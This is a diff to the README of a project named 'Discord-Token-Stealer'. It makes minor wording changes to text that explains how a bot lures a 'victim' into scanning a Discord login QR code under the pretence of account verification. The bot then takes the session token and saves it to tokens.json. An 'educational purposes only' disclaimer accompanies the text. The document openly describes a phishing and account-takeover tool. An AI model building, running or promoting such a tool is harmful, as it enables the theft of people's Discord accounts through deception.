prashantrahul141/Discord-Token-Stealer/README.md

 python main.py
 ```

 Whenever someone types `:verify` in the chat.
 The bot will create a browser instance (firefox) and take the qr code from discord's login page.
-The bot will then send the victim a message to verify their account by scanning the qr code from discord mobile.
+The bot will then send the victim a message to verify their account by scanning the qr code using discord mobile.
 Once scanned, the bot will retrive the token from session storage, check the token against discord, if the token is real, it will save the token in a `tokens.json` file.

 <h2>Warning</h2>
-This project is for educational purposes only, I do not take any responsibilty if you break discord's TOS without their or someone's consent.
+This project is for educational purposes only, I do not take any responsibilty if you break discord's TOS without their and someone's consent.